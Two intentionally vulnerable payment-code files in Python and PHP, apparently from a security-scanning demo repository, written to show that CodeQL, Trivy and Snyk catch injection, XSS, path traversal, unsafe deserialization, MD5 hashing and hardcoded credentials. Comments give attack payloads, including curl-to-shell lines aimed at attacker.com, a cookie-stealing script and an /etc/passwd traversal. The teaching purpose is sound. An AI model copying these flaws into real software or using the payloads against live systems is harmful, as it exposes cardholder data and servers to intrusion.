File: demo/insecure-code/vulnerable_payment.py
# INTENTIONALLY VULNERABLE — demo/negative test case only.
# DO NOT import or deploy this code anywhere.
#
# Purpose: demonstrate that CodeQL SAST and Trivy secret scanning catch real vulnerability
# classes before they reach production. Five CWE categories relevant to PCI-DSS payments.
#
# What catches each issue:
#   Trivy fs --scanners secret  →  CWE-798 (hardcoded credentials)
#   CodeQL (SAST / GitHub Actions) →  CWE-89, CWE-78, CWE-327, CWE-502
#   Snyk DeepCode            →  all five + licence checks
#
# Local demo (no cluster needed):
#   trivy fs --scanners secret demo/insecure-code/vulnerable_payment.py
#   # Expected: CRITICAL finding — API key / hardcoded credential detected
#
# CodeQL results appear as inline PR annotations in the GitHub Security tab.
# See .github/workflows/ci.yaml — codeql job.
#
# Compare every function below to demo/insecure-code/secure_payment.py.

import sqlite3
import os
import hashlib
import pickle


# ─── CWE-798: Hardcoded Credentials ─────────────────────────────────────────
# A hardcoded API key committed to git is exposed to anyone with repo access —
# including contractors, third-party CI tools, and anyone who ever clones the repo.
# Trivy secret scan detects the key pattern (Stripe live key format: sk_live_XXXX...)
# and fails the CI build before the image is pushed.
# GitHub Push Protection also blocks the commit at git-push time if a live-format
# key is present — demonstrating defence-in-depth before code even reaches CI.
# PCI-DSS Req 8: all credentials must be unique and rotatable — hardcoded keys can't be.
#
# NOTE: the value below uses a placeholder deliberately — GitHub Push Protection
# blocked the original commit that contained a real-format Stripe key (sk_live_...).
# That's the defence working. Trivy fs --scanners secret still catches the hardcoded
# variable pattern; for a live demo of the full block, add a real-format key locally
# and run: git push — you'll see the same rejection this repo got during development.
PAYMENT_GATEWAY_KEY = "hardcoded_api_key_never_commit_credentials"  # VULNERABLE — CWE-798 (simulates sk_live_... format)
DATABASE_PASSWORD   = "Sup3rS3cr3tPaymentsDB!"                     # VULNERABLE — CWE-798


# ─── CWE-89: SQL Injection ───────────────────────────────────────────────────
# User-controlled input is concatenated directly into the SQL query string.
# Attack payload:  user_id = "' OR '1'='1' --"
# Result: query becomes SELECT * FROM payments WHERE user_id = '' OR '1'='1' --'
# The attacker dumps the entire payments table — all card numbers, amounts, user IDs.
# CodeQL traces the data flow from the function parameter to cursor.execute()
# and flags it as a critical injection vulnerability.
def get_payment_details(user_id):
    conn = sqlite3.connect("payments.db")
    cursor = conn.cursor()
    query = f"SELECT card_number, amount FROM payments WHERE user_id = '{user_id}'"  # VULNERABLE — CWE-89
    cursor.execute(query)
    return cursor.fetchall()


# ─── CWE-78: OS Command Injection ────────────────────────────────────────────
# user-controlled input is passed to a shell command via os.system().
# Attack payload:  report_name = "jan; curl http://attacker.com/exfil | sh"
# Result: the shell executes both commands — the report runs, AND the payload runs.
# CodeQL flags os.system() with unsanitised user input as high severity.
def generate_payment_report(report_name):
    os.system(f"generate_report.sh {report_name}")   # VULNERABLE — CWE-78


# ─── CWE-327: Use of a Broken or Risky Cryptographic Algorithm ───────────────
# MD5 has been cryptographically broken since 2004 (Wang & Yu collision attack).
# Using it to hash or "mask" cardholder data violates PCI-DSS Requirement 3.4
# (render PAN unreadable anywhere it is stored).
# Snyk and CodeQL both flag md5 usage in security-sensitive contexts.
def mask_card_number(card_number: str) -> str:
    return hashlib.md5(card_number.encode()).hexdigest()   # VULNERABLE — CWE-327


# ─── CWE-502: Deserialization of Untrusted Data ──────────────────────────────
# pickle.loads() on attacker-controlled bytes allows arbitrary code execution.
# Exploit:  craft a pickle payload that runs os.system("curl attacker.com | sh")
# The payload executes the moment loads() is called — before any validation.
# Snyk flags pickle with external input as critical; CodeQL traces the taint flow.
def restore_payment_session(session_blob: bytes):
    return pickle.loads(session_blob)   # VULNERABLE — CWE-502

File: demo/insecure-code/vulnerable_payment.php
<?php
// INTENTIONALLY VULNERABLE — demo/negative test case only.
// DO NOT deploy this file anywhere.
//
// Purpose: PHP-specific vulnerability classes caught by CodeQL, Snyk, and OWASP ZAP DAST.
// PHP is common in legacy payment gateways (WooCommerce, Magento, older acquirer SDKs).
//
// What catches each issue:
//   CodeQL (PHP queries) →  CWE-89, CWE-79, CWE-78, CWE-22
//   Snyk DeepCode        →  CWE-798, CWE-327, all of the above
//   OWASP ZAP DAST       →  CWE-79 (XSS detected in HTTP response)
//   Trivy secret scan    →  CWE-798 (hardcoded DB password)
//   pre-commit gitleaks  →  CWE-798 (blocks the commit before it reaches git)
//
// Local scan:
//   trivy fs --scanners secret demo/insecure-code/vulnerable_payment.php
//
// Compare to: demo/insecure-code/secure_payment.php


// ─── CWE-798: Hardcoded Credentials ─────────────────────────────────────────
// These credentials are now permanently in git history.
// Even if you delete them in a future commit the old SHA still has them.
// Trivy, Snyk, and pre-commit gitleaks all detect common credential patterns.
// PCI-DSS Req 8: credentials must be individual, rotatable, and audited —
// hardcoded values satisfy none of those requirements.
$db_host     = 'payments-db.internal';
$db_user     = 'payments_admin';
$db_password = 'P@ymentDB_Sup3rS3cret!';      // VULNERABLE — CWE-798
$api_key     = 'api_key_hardcoded_in_source';  // VULNERABLE — CWE-798 (simulates live API key)


// ─── CWE-89: SQL Injection ───────────────────────────────────────────────────
// $_GET['payment_id'] is concatenated directly into SQL with no sanitisation.
// Attack: GET /payment.php?payment_id=1+OR+1=1
// Result: query returns ALL payments — full cardholder data dump.
// CodeQL traces the taint flow from $_GET to mysql_query() in PHP.
// PCI-DSS Req 6.2.4: injection flaws are explicitly listed as requiring prevention.
function get_payment($conn) {
    $payment_id = $_GET['payment_id'];                               // tainted input
    $query = "SELECT * FROM payments WHERE id = " . $payment_id;    // VULNERABLE — CWE-89
    return mysql_query($query, $conn);
}


// ─── CWE-79: Reflected Cross-Site Scripting (XSS) ────────────────────────────
// $_GET['status'] is echoed directly into the HTML page with no encoding.
// Attack: GET /payment.php?status=<script>fetch('https://attacker.com?c='+document.cookie)</script>
// Result: session cookie exfiltration — attacker hijacks the user's session.
// OWASP ZAP DAST detects this by injecting payloads and inspecting the HTTP response.
// CodeQL flags unencoded output of GET/POST parameters as CWE-79.
function show_payment_status() {
    $status = $_GET['status'];
    echo "<div class='status'>Payment status: " . $status . "</div>";  // VULNERABLE — CWE-79
}


// ─── CWE-78: OS Command Injection ────────────────────────────────────────────
// $amount from user input is passed to a shell command with no validation.
// Attack: amount=100%3B+curl+https%3A%2F%2Fattacker.com%2Fexfil+|+sh
//   (URL-decoded: 100; curl https://attacker.com/exfil | sh)
// Result: arbitrary command execution on the server — data exfiltration or backdoor install.
// CodeQL traces exec()/system()/passthru() calls with unsanitised user input.
function generate_receipt($amount) {
    exec("generate_receipt.sh " . $amount);    // VULNERABLE — CWE-78
}


// ─── CWE-22: Path Traversal / Local File Inclusion (LFI) ─────────────────────
// User controls which template file is included via the query string.
// Attack: GET /payment.php?template=../../etc/passwd
// Result: server file disclosure. With log poisoning, this becomes remote code execution.
// CodeQL flags include()/require() with unsanitised user-controlled path components.
function load_template() {
    $template = $_GET['template'];
    include('/var/www/templates/' . $template . '.php');    // VULNERABLE — CWE-22
}


// ─── CWE-327: Broken or Risky Cryptographic Algorithm ────────────────────────
// MD5 has been broken since 2004 (Wang & Yu, practical collisions).
// Storing cardholder data hashed with MD5 violates PCI-DSS Req 3.4:
// "Render PAN unreadable anywhere it is stored" — MD5 does not qualify.
// Snyk DeepCode flags md5() on payment/card data as a high-severity finding.
function hash_card_number($card_number) {
    return md5($card_number);    // VULNERABLE — CWE-327
}
